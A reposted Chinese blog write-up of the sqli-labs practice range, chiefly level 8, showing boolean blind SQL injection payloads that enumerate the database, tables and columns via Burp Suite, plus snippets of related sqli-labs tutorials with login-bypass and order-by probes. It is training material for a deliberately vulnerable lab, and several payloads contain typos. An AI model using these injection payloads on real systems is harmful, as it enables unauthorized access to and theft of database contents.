sqli_labs靶场——第8-22关

第8关

手工

注入点

  1. 单引号
    输入单引号页面不能正常显示
    2.构造正确逻辑
    页面正常显示
    3.错误逻辑
    页面什么不显示
    补充:根据页面显示,本关可以用布尔盲注和时间注入;选择用布尔盲注,因为9-10是可以练习事件注入的

数据库长度

数据库

利用Burpsuite,帮助我们加快测试的流程

语句

  • ' and ascii(substr(database(),1,1))=97--+

使用bp



使用时,会出现下图的提示



根据上图的结果,查看ascii码表可得出数据库为security

数据表

确定当前库中有几张表

命令

1' and (select count(table_name) from inforrmation_schema.tables where table_schema=database())=1--+

使用bp



设置变量,根据返回的特征you are in......来确定当前表的数量
得到结果4张表

确定第x张表的长度

命令

1' and length((select table_name from information_schema.tables where table_schema=database() limit 3,1))=5--+

确定表名

1' and substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1)=a--+
1' and asci(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=97--+

使用bp

我麻木了,不想进行此步操作了

确定有几列

1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users')=1--+

确定第x列的长度

1' and lenth((选择列的命令 limit 0,1))=3--+

确定第x列的名字

1' and abstr((选择列的命令 limit 0,1),1,1)='a'--+
1' and ascii(abstr((选择列的命令 limit 0,1),1,1))=97--+

具体数值

获取字段有多少行数据

获取每行数据的长度

获取每行的具体内容

工具

获取当前数据库

获取表名

获取列名

获取数值

总结

推荐这些技术文章:

sqli_labs靶场——第8-22关

第8关 手工 注入点 单引号 输入单引号页面不能正常显示 2.构造正确逻辑 页面正常显示 3.错误逻辑 页面什么不显示 补充:根据页面显示,本关可以用布尔盲注和时间注入;选择用布尔盲注,因为9-10是可以练习事件注入的 数据库长度 数据库 利用Burpsuite,帮助我们加快测试的流程 语句 ' and ascii(substr(database(),1,1))=97--+ 使用bp ...

sqli_labs靶场——第8-22关

第8关 手工 注入点 单引号 输入单引号页面不能正常显示 2.构造正确逻辑 页面正常显示 3.错误逻辑 页面什么不显示 补充:根据页面显示,本关可以用布尔盲注和时间注入;选择用布尔盲注,因为9-10是可以练习事件注入的 数据库长度 数据库 利用Burpsuite,帮助我们加快测试的流程 语句 ' and ascii(substr(database(),1,1))=97--+ 使用bp ...

基于sqli-labs靶场的sql注入学习终结篇

第三十八关
这个题可以用第一关的方式注入成功,但这个题主要是用来测试堆叠注入。
所谓堆叠注入就是在原语句后加上分号,从而闭合前面的内容作为第一条 SQL 语句。然后在后面输入第二条的数据库操作语句,在条件允许可以被后端带入数据库执行。区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句(而且只能查询相同的列数,和相同的字段类型),而堆叠注入可以执行的是任意的s...

sqli-labs(11-20)

less-11
本关还可以使用union联合查询注入和盲注
(1)使用burpsuite抓包,修改参数构造payload。
输入uname=admin' and 1=1--+&passwd=admin&submit=Submit

 可以登录
(2)输入uname=admin' and 1=2--+&passwd=admin&submit=Submit
...

sqli-labs靶场(1-22)SQL注入

SQL-labs文件上传靶场学习
SQL注入
相关知识准备:
show databases; //查看数据库

use xxx; //使用某个数据库

show tables; //查看该数据库的数据表

desc xxx; //查看该数据表的结构

select * from xxx; //查找某个数据表的所有内容

select schema_name from information_sc...

SQL注入:sqli-labs 1~4

第一题:
http://127.0.0.1/sqli/Less-1/?id=1 不报错http://127.0.0.1/sqli/Less-1/?id=100 不报错http://127.0.0.1/sqli/Less-...

SQL注入靶场sqli-labs专项练习

前言
荒废了几个月,最近重拾ctf,先从sql靶场开始练习(持续更新)
Less-1

http://127.0.0.1/sqli/Less-1/?id=1

 
页面回显了注入语句,接下来测试列数

http://127.0.0.1/sqli/Less-1/?id=1' order by 3--+

 
 测出三列,下面测试注入点

http://127.0....

sql-labs 第一关

?id=1 ?id=1' 和第一个结果不同?id=1 and 1=1 和第一个结果相同?id=1 and 1=2 和第一个结果相同?id=1 order by 3 和第一个结果相同?id=1 order by 100000 为什么结果都和第一个一样?id=-1 union 1,2,3 什么都不输出?id=1 union select 1,database(),3 和第一个一样?id=1' and...

基于upload-labs靶场的文件上传学习

第五—六关
关于获取字段的小技巧:我们从后台源码中,一般只要看到 select * from 表名,一般是要猜这个表里的所有字段,然后进行注入,如果是 select username,password from 表名,这种形式的可以直接利用2个字段,作为语句的注入字段。
判断注入类型
首先http://127.0.0.1/sqli-labs-master/Less-5/?id=1
出现下面的页面...

Sqli-labs less17-22

Sqli-labs
为便于学习构造SQL语句的方式,需在每个less下的index.php文件中添加输出SQL语句的代码:

less17:
除了固定添加的两行代码外,还需添加两行代码

输入uname=admin&passwd=admin正确,输入uname=edg&passwd=admin错误且回显语句中不显示密码

输入uname=admin'#&passwd=a...

文章标题:sqli_labs靶场——第8-22关
文章链接:https://www.dianjilingqu.com/2724.html
本文章来源于网络,版权归原作者所有,如果本站文章侵犯了您的权益,请联系我们删除,联系邮箱:saisai#email.cn,感谢支持理解。
THE END
< <上一篇
下一篇>>